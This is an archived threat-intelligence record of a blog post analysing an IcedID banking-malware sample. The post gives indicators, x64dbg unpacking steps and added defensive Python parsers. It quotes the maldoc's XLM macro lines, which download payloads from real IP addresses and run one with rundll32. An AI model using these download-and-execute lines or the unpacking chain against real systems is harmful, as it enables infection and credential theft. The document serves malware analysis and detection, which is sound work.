{
	"id": "4c848b50-f331-4ee5-ad49-59ad764481b4",
	"created_at": "2026-04-06T00:15:58.990085Z",
	"updated_at": "2026-04-10T13:11:28.557016Z",
	"deleted_at": null,
	"sha1_hash": "928b28d3a410b7cf75241aa3f272322afa5e9c5f",
	"title": "IcedID Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2056075,
	"plain_text": "IcedID Analysis\r\nPublished: 2021-04-09 · Archived: 2026-04-06 00:04:59 UTC\r\nIcedID (aka BokBot) is banking malware designed to steal financial information. Lunar Spider is the threat actor behind IcedID and has been running campaigns with it since at least 2017. Besides stealing banking information, some incidents show IcedID acting as the entry stage for a ransomware or RAT attack. It has been observed lately that the threat actor uses new techniques to evade detection by endpoint security, sandboxes and reverse engineering, which makes it worthwhile to dissect samples for indicators and other artifacts that security tools could miss.\r\nIn this post, we take a look at an IcedID sample posted on Malware-traffic-analysis.net and walk through each artifact to learn how to unpack the hidden malicious binaries. These techniques also work on other IcedID samples found recently.\r\nbehaviour overview\r\nThe threat actor sends an email with an attached ZIP archive containing a maldoc, either an MS Word document or an Excel spreadsheet. When the maldoc is opened it asks the user to enable macros. Once enabled, the macro does two things: it downloads a DLL file and runs it in a process using ‘rundll32.exe’. The downloaded DLL carries an unfamiliar extension (here .hod) rather than .dll. Once running, this DLL (the ‘Installer’) mainly does two things: it downloads a GZIP-compressed binary and installs it. The GZIP may have a .zip extension, but it cannot be opened or extracted with any archive tool. The GZIP is essentially a dropper, packed with two binaries. 
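Both rundll32 invocations this post records share traits a defender can key on: the maldoc runs Rundll32 ..\Kiod.hod2,DllRegisterServer (a relative path with a non-DLL extension), and the dropped components later run as rundll32.exe [filename],update /i:"LuxuryQuarter\license.dat". The Python script below is an added example, not code from the original post or from IcedID itself. It splits rundll32 command lines the way rundll32 does (module, then the export after the comma, then the export's argument string) and flags those traits. The command lines are constructed Sysmon-style samples: the first three mirror the post's invocations, but the full directory paths, the victim user name and the two benign lines are assumptions made for the example.

```python
import ntpath
import re

# Constructed Sysmon-style (Event ID 1) command lines. The first three mirror
# the rundll32 invocations the post describes; the full directory paths and
# the two benign lines at the end are assumptions made for this example.
SAMPLE_CMDLINES = [
    r'Rundll32 ..\Kiod.hod2,DllRegisterServer',
    r'rundll32.exe C:\Users\victim\AppData\Local\Temp\suit_32.tmp,update /i:"LuxuryQuarter\license.dat"',
    r'"C:\Windows\System32\rundll32.exe" "C:\ProgramData\LuxuryQuarter\Oxiwko.dll",update /i:"LuxuryQuarter\license.dat"',
    r'rundll32.exe shell32.dll,Control_RunDLL hotplug.dll',
    r'C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\tmp\report.bin',
]

# Matches the (optionally quoted, optionally path-qualified) rundll32 image
# and captures everything after it.
_IMAGE = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s*(.*)$', re.IGNORECASE)

# Directories the post's components were dropped into (%TEMP% and
# C:\ProgramData), compared case-insensitively against the module path.
SUSPICIOUS_DIRS = ('\\appdata\\local\\temp\\', '\\programdata\\', '\\users\\public\\')


def parse_rundll32(cmdline):
    """Split a rundll32 command line into (module, export, argument string).

    rundll32 reads the module up to the first comma (or to the closing quote
    if the path is quoted), then the export name up to the first space, and
    hands the remainder to the export unchanged. Returns None for command
    lines that do not invoke rundll32.
    """
    m = _IMAGE.match(cmdline)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith('"'):
        close = rest.find('"', 1)
        module, rest = rest[1:close], rest[close + 1:]
    else:
        module, _, rest = rest.partition(',')
    export, _, args = rest.lstrip(',').partition(' ')
    return module, export, args.strip()


def triage_rundll32(cmdline):
    """Return the reasons a rundll32 command line deserves a look (an empty
    list means nothing notable). Encodes the traits of the chain the post
    describes."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return []
    module, export, args = parsed
    low = module.lower()
    reasons = []
    # Kiod.hod2 / suit_32.tmp: a loaded module that is not named like a DLL
    # (.cpl and .ocx are the common benign non-.dll cases).
    if ntpath.splitext(low)[1] not in ('.dll', '.cpl', '.ocx'):
        reasons.append('module extension is not a DLL: ' + module)
    if low.startswith('..\\') or low.startswith('.\\'):
        reasons.append('module given as a relative path')
    if any(d in low for d in SUSPICIOUS_DIRS):
        reasons.append('module loaded from a dropper directory')
    # The post's run method for the temporary and persistent DLLs.
    if export.lower() == 'update' and args.lower().startswith('/i:'):
        reasons.append('IcedID-style "update /i:<payload>" invocation')
    return reasons


if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        reasons = triage_rundll32(line)
        print(line)
        print('   ' + ('; '.join(reasons) if reasons else 'nothing notable'))
```

The two benign lines come back clean, the maldoc's line trips the extension and relative-path checks, and the dropped DLLs trip the dropper-directory and update /i: checks; the export name alone (DllRegisterServer is used legitimately all the time) is deliberately not a signal.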
Without further ado, let’s get started with the artifacts below.\r\n\r\nFile Name                  Description             File Type          SHA256 (truncated in the original)\r\n82025721897_03192021.xlsm  Maldoc                  Excel spreadsheet  dcc45c82a484a420888aabe66588cbb1658cb2a7a5cc833b0438fa06\r\nKiod.hod                   Installer DLL           DLL                d1634c8dd16b4b1480065039fac62d6c1900692f0ccc9bf52c8ddc65\r\nsuit_32.tmp                Temporary DLL           DLL                b8502cc6fd41a558012e7ccd0a7f4e0ed5746bf106b8bf5b6a27ef9cb\r\nOxiwko.dll                 Persistent DLL          DLL                48b72914126b6b4a3e5aefa9bc8d5eac1187543eb0fa42c98a70a2f2a\r\nlicense.dat                IcedID DLL (encrypted)  -                  45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085b\r\nTable 1, List of IcedID artifacts to analyze\r\nhttps://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/\r\nPage 1 of 13\r\n\r\nmaldoc\r\nOne of the most recognized IcedID spreadsheet templates; behind it hide XLM 4.0 macro functions that download and run a process once the user hits Enable Content, as with any typical maldoc.\r\nFigure 2, IcedID template\r\nIcedID uses the “Auto_Open” function to execute the entire XLM (4.0) script. 
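The =CALL lines recovered from the sheet (listed under Figure 3 below) are the most useful thing in the maldoc, and they follow a fixed shape: CALL(dll, export, type string, then the export's own arguments, which for URLDownloadToFileA are pCaller, szURL and szFileName). The Python script below is an added example, not part of the original post. It tokenizes XLM 4.0 formulas, pulls the URL and destination out of each URLDownloadToFileA call, and works out which downloaded file the shell command actually executes. The three CALL lines are the post's own; wrapping the Rundll32 command in =EXEC() and the trailing =HALT() are assumptions about how the sheet issued them, since the post lists only the command text.

```python
import re
from urllib.parse import urlparse

# The clear-text XLM 4.0 formulas recovered from the sheet, as the post lists
# them. The =EXEC() wrapper around the Rundll32 command and the =HALT() line
# are assumptions; the post records only the command text.
MACRO_LINES = [
    '=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "http://188.127.237.152/44295.4021160879.dat", "..\\Kiod.hod")',
    '=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "http://45.150.67.13/44295.4021160879.dat", "..\\Kiod.hod1")',
    '=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "http://185.82.219.225/44295.4021160879.dat", "..\\Kiod.hod2")',
    '=EXEC("Rundll32 ..\\Kiod.hod2,DllRegisterServer")',
    '=HALT()',
]

_FORMULA = re.compile(r'^\s*=\s*([A-Za-z_.]+)\s*\((.*)\)\s*$')
_STRING = re.compile(r'"((?:[^"]|"")*)"')   # XLM escapes a quote by doubling it


def parse_xlm_formula(line):
    """Parse one XLM 4.0 formula into (FUNCTION_NAME, [arguments]).

    Quoted arguments come back unquoted with "" resolved to "; anything else
    (numbers, cell references) is kept as written. Returns None for lines
    that are not a function call.
    """
    m = _FORMULA.match(line)
    if not m:
        return None
    name, body = m.group(1).upper(), m.group(2)
    args, pos = [], 0
    while pos < len(body):
        if body[pos] in ' ,':          # argument separators
            pos += 1
        elif body[pos] == '"':
            s = _STRING.match(body, pos)
            args.append(s.group(1).replace('""', '"'))
            pos = s.end()
        else:                          # bare token up to the next comma
            end = body.find(',', pos)
            end = len(body) if end < 0 else end
            args.append(body[pos:end].strip())
            pos = end
    return name, args


def extract_iocs(lines):
    """Collect URLs, hosts, drop paths and shell commands from the macro, and
    work out which dropped file the shell command actually runs."""
    iocs = {'urls': [], 'hosts': [], 'drop_paths': [], 'commands': []}
    for line in lines:
        parsed = parse_xlm_formula(line)
        if parsed is None:
            continue
        name, args = parsed
        # CALL(dll, export, type string, <export args...>); for
        # URLDownloadToFileA the export args are pCaller, szURL, szFileName.
        if name == 'CALL' and len(args) >= 6 and args[1].lower() == 'urldownloadtofilea':
            url, dest = args[4], args[5]
            iocs['urls'].append(url)
            iocs['hosts'].append(urlparse(url).hostname)
            iocs['drop_paths'].append(dest)
        elif name == 'EXEC' and args:
            iocs['commands'].append(args[0])
    # A drop path counts as executed only if it appears as a whole token of a
    # command (prefix matching would wrongly match ..\Kiod.hod to ..\Kiod.hod2).
    tokens = {t.lower() for c in iocs['commands'] for t in re.split(r'[\s,]+', c)}
    iocs['executed'] = [p for p in iocs['drop_paths'] if p.lower() in tokens]
    return iocs


if __name__ == '__main__':
    for key, values in extract_iocs(MACRO_LINES).items():
        print(key, values)
```

Feeding the same lines through gives the three hosts for blocking, the three drop names for host-based hunting, and ..\Kiod.hod2 as the one file the chain actually runs, which is the artifact worth pulling from a compromised host first.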
Moving between sheets and cells, it’s possible to debug the function step by step, but what matters most is that the IOCs sit there in clear text.\r\nHost-based and Network-based IOCs\r\n--------Shell Command --------------------\r\nRundll32 ..\\Kiod.hod2,DllRegisterServer\r\n------------------------------------------\r\n--------Contacted IP Addresses -----------\r\n188.127.237.152\r\n45.150.67.13\r\n185.82.219.225\r\n------------------------------------------\r\n---------Calls --------------------------\r\n=CALL(\"URLMon\", \"URLDownloadToFileA\", \"JCCB\", 0, \"http://188.127.237.152/44295.4021160879.dat\", \"..\\Kiod.hod\")\r\n=CALL(\"URLMon\", \"URLDownloadToFileA\", \"JCCB\", 0, \"http://45.150.67.13/44295.4021160879.dat\", \"..\\Kiod.hod1\")\r\n=CALL(\"URLMon\", \"URLDownloadToFileA\", \"JCCB\", 0, \"http://185.82.219.225/44295.4021160879.dat\", \"..\\Kiod.hod2\")\r\n------------------------------------------\r\nFigure 3, Maldoc behavioral from Tria.ge sandbox\r\nNote that the three calls fetch the same URL path from three different hosts into three local names (Kiod.hod, Kiod.hod1, Kiod.hod2) and the shell command runs only the last one; all three hosts belong on the block list regardless of which download succeeded.\r\ninstaller dll\r\n‘Kiod.hod’ is the first-stage IcedID executable in this sample. It’s a 64-bit DLL (MZ header) that the maldoc runs inside a ‘rundll32’ process it creates. When the sample is run on the Hatching Triage sandbox, the network trace shows requests to ‘aws.amazon[.]com’ and ‘calldivorce[.]fun’: the installer downloads a GZIP file and installs it. Keep in mind that aws.amazon[.]com is a legitimate Amazon domain that appears in plenty of benign traffic, so on its own it is not a usable block-list entry; the request to calldivorce[.]fun is the one to hunt for. None of these network indicators are visible when analyzing the sample statically, nor when debugging it, which is usually a sign of a packed executable.\r\nFigure 4, Installer behavioral on tria.ge sandbox\r\nThe import table lists a single library, ‘kernel32.dll’, and no imported APIs that could guide static analysis or a debugger breakpoint towards the indicators. Simply loading the sample in x64dbg doesn’t work! 
There are multiple ways to unpack the installer DLL; the quickest workable one is to run it under rundll32 (~Windows\\System32\\rundll32) in x64dbg, like the steps below:\r\n1. x64dbg -\u003e File -\u003e Open -\u003e C:\\Windows\\System32\\rundll32.exe\r\n2. x64dbg -\u003e File -\u003e Change Command Line -\u003e \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\~\\lab\\Kiod.dll\",DllRegisterServer\r\n* no spaces except the single space between the two quoted strings, and use the full path to the DLL\r\n** DllRegisterServer is the exported function\r\n3. After hitting OK, go to Options -\u003e Preferences -\u003e Events tab -\u003e check ✔ DLL Entry\r\n4. Hit F9 (it runs for a few seconds and pauses)\r\nDirectly after pausing you can see that register ‘R14’ points at a PE header (the MZ signature) and the region is ready to be saved with Save Memory Region (dump it from the Memory Map). The unpacked executable is still in its unmapped (file) layout, so no changes to the addresses in the section headers are required.\r\nFigure 5, unpack IcedID installer\r\n----------------------------------\r\nUnpacked Installer - unpacked file\r\n----------------------------------\r\nSHA256: 7459E88626A90B52C3392A14734D00A5238EDBF13C61907F39326DF2D4C3F922\r\nHOST IOC: C:\\ProgramData\\\r\nNetwork IOC: aws.amazon.com\r\n             calldivorce.fun/~[GZIP file]\r\nsubmitted sample on (9 April 2021)\r\n23/61 VT: https://www.virustotal.com/gui/file/7459e88626a90b52c3392a14734d00a5238edbf13c61907f39326df2d4c3f922/detection\r\n10/10 Triage: https://tria.ge/210409-af3skeevmx/behavioral2\r\nother highlighted IOCs\r\nLibraries\r\n winhttp.dll\r\nImports (APIs)\r\nLookupAccountNameW
,advapi32.dll\r\nWinHttpQueryDataAvailable,winhttp.dll\r\nWinHttpConnect,winhttp.dll\r\nWinHttpSetStatusCallback,winhttp.dll\r\nWinHttpSendRequest,winhttp.dll\r\nWinHttpCloseHandle,winhttp.dll\r\nWinHttpSetOption,winhttp.dll\r\nWinHttpOpenRequest,winhttp.dll\r\nWinHttpReadData,winhttp.dll\r\nWinHttpQueryHeaders,winhttp.dll\r\nWinHttpOpen,winhttp.dll\r\nWinHttpReceiveResponse,winhttp.dll\r\nWinHttpQueryOption,winhttp.dll\r\nCreateProcessA,kernel32.dll\r\nSwitchToThread,kernel32.dll\r\nIt’s clear which APIs and libraries the packed installer was hiding, and in this unpacked form they are detectable by any endpoint security product, as Pestudio shows. The unpacked DLL was further disassembled with Cutter 2.0.0 to get more indicators.\r\nFigure 6, Pestudio and Cutter views of unpacked installer\r\nTEMPORARY DLL\r\nsuit_32.tmp is another 64-bit DLL, dropped from the GZIP together with the ‘license.dat’ binary. It is located in the %temp% directory:\r\nC:\\Users\\[username]\\AppData\\Local\\Temp\\suit_32.tmp\r\nThe main purpose of this temporary DLL is to set up persistence with ‘license.dat’ and later copy itself to another directory for persistence.\r\nRun method: rundll32.exe [filename],update /i:\"LuxuryQuarter\\license.dat\"\r\nThis artifact is also well packed for evasion and anti-analysis purposes; like the ‘installer’, it has no imported libraries or APIs to hint at where to set a breakpoint. To unpack it:\r\n1. Load 'suit_32.tmp' in x64dbg\r\n2. Single-step or step over until execution reaches the [RtlExitUserProcess] API function\r\n3. Check the stack or the RDI register for an MZ header\r\n4. 
Dump from the Memory Map\r\nThis dump needs its section addresses fixed up (raw pointers matched to virtual addresses) because the image was dumped in its mapped, in-memory layout.\r\nFigure 7, x64dbg to unpack temporary DLL\r\n-----------------------------\r\nTemporary DLL - unpacked file\r\n-----------------------------\r\nSHA256: AD435DB375665D157AED16BA8B51735B65AC6AEE86864DA78408B44C9D85093B\r\nHOST IOC: C:\\ProgramData\\\r\nNetwork IOC: N/A\r\nSubmitted sample on (4 April 2021)\r\n15/69 VT: https://www.virustotal.com/gui/file/ad435db375665d157aed16ba8b51735b65ac6aee86864da78408b44c9d85093b/detection\r\n1/10 Triage: https://tria.ge/210403-1sm7qxep8n/behavioral2\r\nOther highlighted IOCs\r\nImports (APIs)\r\nVirtualProtect, Kernel32.dll\r\nGetModuleFileNameA, Kernel32.dll\r\nCompared with the packed version, the Triage sandbox analysis of the unpacked file shows a new C2!\r\n/update/ 10 Apr\r\nIt’s been brought up by the community that the IPs above are not C2s.\r\nPersistent DLL\r\n‘Oxiwko.dll’ is supposed to be a copy of the previous temporary DLL. The big picture from the entropy view and Pestudio shows the resemblance. 
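Whether a dump needs its section headers fixed comes down to which layout the bytes are in. The installer came out in file layout (each section's bytes sit at PointerToRawData), so its headers were already consistent; the temporary DLL, and the persistent DLL that is unpacked the same way, come out in mapped layout (each section's bytes sit at VirtualAddress and the region spans SizeOfImage), so a disassembler reading the on-disk pointers would load the wrong bytes. The Python script below is an added example, not part of the original post or of any unpacking tool the post uses. It detects the mapped layout with that heuristic and rewrites PointerToRawData and SizeOfRawData from VirtualAddress and VirtualSize. Since none of the post's samples are embedded here, it builds a tiny constructed PE32+ image in mapped layout to run on.

```python
import struct

# name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# reloc ptr, line-number ptr, reloc count, line-number count, characteristics
_SECTION_HDR = '<8sIIIIIIHHI'


def build_test_image():
    """Construct a tiny PE32+ DLL image in mapped layout, the way a region
    saved from x64dbg's Memory Map looks: headers at offset 0, each section's
    bytes at its VirtualAddress, and a section table still carrying the
    on-disk PointerToRawData values. Constructed for this example only; it
    is not one of the post's samples."""
    spec = [(b'.text', 0x1000, b'\x33\xc0\xc3'),            # xor eax,eax ; ret
            (b'.data', 0x2000, b'IcedID-example-data')]
    e_lfanew, size_of_image, sect_align, file_align = 0x80, 0x3000, 0x1000, 0x200
    dos = (b'MZ' + bytes(58) + struct.pack('<I', e_lfanew)).ljust(e_lfanew, b'\0')
    coff = struct.pack('<HHIIIHH', 0x8664, len(spec), 0, 0, 0, 240, 0x2022)
    opt = struct.pack('<HBBIIIIIQIIHHHHHHIIIIHHQQQQII',
                      0x20b, 14, 0, 0x200, 0x200, 0, 0x1000, 0x1000,   # magic .. BaseOfCode
                      0x180000000, sect_align, file_align,            # ImageBase, alignments
                      6, 0, 0, 0, 6, 0, 0,                            # versions, Win32VersionValue
                      size_of_image, 0x400, 0, 2, 0x160,              # SizeOfImage .. DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + bytes(128)  # stacks, heaps, dirs
    table = b''
    for i, (name, va, payload) in enumerate(spec):
        on_disk_ptr = 0x400 + i * file_align      # where the bytes sat in the original file
        table += struct.pack(_SECTION_HDR, name, len(payload), va, file_align, on_disk_ptr,
                             0, 0, 0, 0, 0x60000020)
    image = bytearray(size_of_image)
    headers = dos + b'PE\0\0' + coff + opt + table
    image[:len(headers)] = headers
    for name, va, payload in spec:
        image[va:va + len(payload)] = payload
    return bytes(image)


def _pe_offsets(data):
    """Return (e_lfanew, NumberOfSections, offset of the section table)."""
    if data[:2] != b'MZ':
        raise ValueError('missing MZ header')
    e_lfanew = struct.unpack_from('<I', data, 0x3c)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    nsect = struct.unpack_from('<H', data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from('<H', data, e_lfanew + 20)[0]
    return e_lfanew, nsect, e_lfanew + 24 + opt_size


def sections(data):
    """List the section table as dicts (name, vsize, va, rawsize, rawptr)."""
    _, nsect, table = _pe_offsets(data)
    out = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr = struct.unpack_from(_SECTION_HDR, data, table + 40 * i)[:5]
        out.append({'name': name.rstrip(b'\0').decode(), 'vsize': vsize, 'va': va,
                    'rawsize': rawsize, 'rawptr': rawptr})
    return out


def is_mapped_dump(data):
    """Heuristic used here: a region dumped from memory spans SizeOfImage and
    keeps section data at VirtualAddress, so its PointerToRawData values no
    longer agree with where the bytes actually are."""
    e_lfanew = _pe_offsets(data)[0]
    size_of_image = struct.unpack_from('<I', data, e_lfanew + 24 + 56)[0]
    return len(data) >= size_of_image and any(s['rawptr'] != s['va'] for s in sections(data))


def realign_sections(data):
    """Rewrite the section table of a mapped dump so tools parsing it as a
    file find each section where the dump actually holds it:
    PointerToRawData := VirtualAddress, SizeOfRawData := VirtualSize (or the
    distance to the next section when VirtualSize is 0). FileAlignment is set
    to SectionAlignment so the two stay consistent."""
    data = bytearray(data)
    e_lfanew, nsect, table = _pe_offsets(data)
    opt = e_lfanew + 24
    sect_align, = struct.unpack_from('<I', data, opt + 32)
    size_of_image, = struct.unpack_from('<I', data, opt + 56)
    struct.pack_into('<I', data, opt + 36, sect_align)          # FileAlignment
    secs = sections(data)
    for i, s in enumerate(secs):
        end = secs[i + 1]['va'] if i + 1 < nsect else size_of_image
        rawsize = s['vsize'] or (end - s['va'])
        struct.pack_into('<II', data, table + 40 * i + 16, rawsize, s['va'])
    return bytes(data)


if __name__ == '__main__':
    dump = build_test_image()
    print('mapped layout:', is_mapped_dump(dump))
    fixed = realign_sections(dump)
    for s in sections(fixed):
        print(s['name'], hex(s['va']), '->', hex(s['rawptr']),
              fixed[s['rawptr']:s['rawptr'] + s['rawsize']][:20])
```

Run on the installer dump from the previous section, is_mapped_dump would come back False and nothing would be rewritten; on the temporary DLL dump it comes back True and the rewrite is the "addresses matching" step.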
That resemblance makes it easy to unpack this sample with the same method used above for the temporary DLL.\r\nFigure 8, Persistent DLL matching with temp DLL\r\n------------------------------\r\nPersistent DLL - unpacked file\r\n------------------------------\r\nSHA256: c04101f36a7d1498379ff6abb2218a2730ad896908e525cd3664ea5cc4a56a18\r\nHOST IOC: C:\\ProgramData\\\r\nNetwork IOC: N/A\r\nSubmitted sample on VT and Tria.ge (9 April 2021)\r\n21/69 VT: https://www.virustotal.com/gui/file/c04101f36a7d1498379ff6abb2218a2730ad896908e525cd3664ea5cc4a56a18/detection\r\n1/10 Triage: https://tria.ge/210409-tdel4edx32/static1\r\nOther highlighted IOCs\r\nImports (APIs)\r\nVirtualProtect, Kernel32.dll\r\nGetModuleFileNameA, Kernel32.dll\r\nThere is no network indicator in either the packed or the unpacked form, which makes sense: the sole purpose of this file is to persist through a Task Scheduler job that loads ‘license.dat’.\r\nFigure 9, Persistent [snap from malware-traffic-analysis]\r\nIcedID (license.dat)\r\nLeaving the beast for last! Even though it was submitted to VT as early as March 1st, 2021, many vendors still do not recognize that ‘license.dat’ is IcedID.\r\nHuge credit to the BinaryDefense team for their efforts in building the decryption tool for this part of IcedID and publishing it on GitHub.\r\nThe unknown encrypted ‘license.dat’ binary is run from Task Scheduler through the persistent DLL. As it turns out, the unknown binary is also a 64-bit DLL. Unlike the previous DLLs, this is a different kind of beast, and it is what IcedID (BokBot) is all about. The decryption tool does a good job of recovering a readable DLL from the encrypted binary. However, because this part is so complex, it is only possible to disassemble it in IDA, Cutter or other disassemblers. 
It’s not possible to debug it.\r\nNevertheless, it’s possible to reverse engineer its functions with a proper disassembler to expose the behavior, which, judging by its API list, should be detectable by endpoint products. The main functions of ‘license.dat’ are collecting host and user information and connecting to the C2.\r\nFigure 10, Decrypted license.dat\r\n---------------------------\r\nDecrypted license.dat file\r\n---------------------------\r\nSHA256: 66b6a55b67c0201a02dbdc4a2ef3c3f2d57aaadbbefa61c1bcdb59b96fb86743\r\nsubmitted on VT and Triage on (9 April 2021)\r\n16/67 VT: https://www.virustotal.com/gui/file/66b6a55b67c0201a02dbdc4a2ef3c3f2d57aaadbbefa61c1bcdb59b96fb86743/detection\r\n1/10 triage: https://tria.ge/210409-1satexfe4j\r\nFurther analysis will follow on IcedID campaigns in general and on ‘license.dat’ in particular, to better understand its behavior.\r\nTO BE CONTINUED….\r\nCredit\r\nTo BinaryDefense, https://www.binarydefense.com/icedid-gziploader-analysis/ for providing the decryption tool\r\nTo Malware Traffic Analysis, https://www.malware-traffic-analysis.net/ for the artifacts and Wireshark packet captures\r\nReferences\r\nhttps://www.group-ib.com/blog/icedid\r\nSource: https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/"
	],
	"report_names": [
		"icedid-analysis"
	],
	"threat_actors": [
		{
			"id": "c2385aea-d30b-4dbc-844d-fef465cf3ea9",
			"created_at": "2023-01-06T13:46:38.916521Z",
			"updated_at": "2026-04-10T02:00:03.144667Z",
			"deleted_at": null,
			"main_name": "LUNAR SPIDER",
			"aliases": [
				"GOLD SWATHMORE"
			],
			"source_name": "MISPGALAXY:LUNAR SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7cfe3bc9-7a6c-4ee1-a635-5ea7b947147f",
			"created_at": "2024-06-19T02:03:08.122318Z",
			"updated_at": "2026-04-10T02:00:03.652418Z",
			"deleted_at": null,
			"main_name": "GOLD SWATHMORE",
			"aliases": [
				"Lunar Spider "
			],
			"source_name": "Secureworks:GOLD SWATHMORE",
			"tools": [
				"Cobalt Strike",
				"GlobeImposter",
				"Gozi",
				"Gozi Trojan",
				"IcedID",
				"Latrodectus",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "475ea823-9e47-4098-b235-0900bc1a5362",
			"created_at": "2022-10-25T16:07:24.506596Z",
			"updated_at": "2026-04-10T02:00:05.015497Z",
			"deleted_at": null,
			"main_name": "Lunar Spider",
			"aliases": [
				"Gold SwathMore"
			],
			"source_name": "ETDA:Lunar Spider",
			"tools": [
				"BokBot",
				"IceID",
				"IcedID",
				"NeverQuest",
				"Vawtrak",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434558,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/928b28d3a410b7cf75241aa3f272322afa5e9c5f.pdf",
		"text": "https://archive.orkl.eu/928b28d3a410b7cf75241aa3f272322afa5e9c5f.txt",
		"img": "https://archive.orkl.eu/928b28d3a410b7cf75241aa3f272322afa5e9c5f.jpg"
	}
}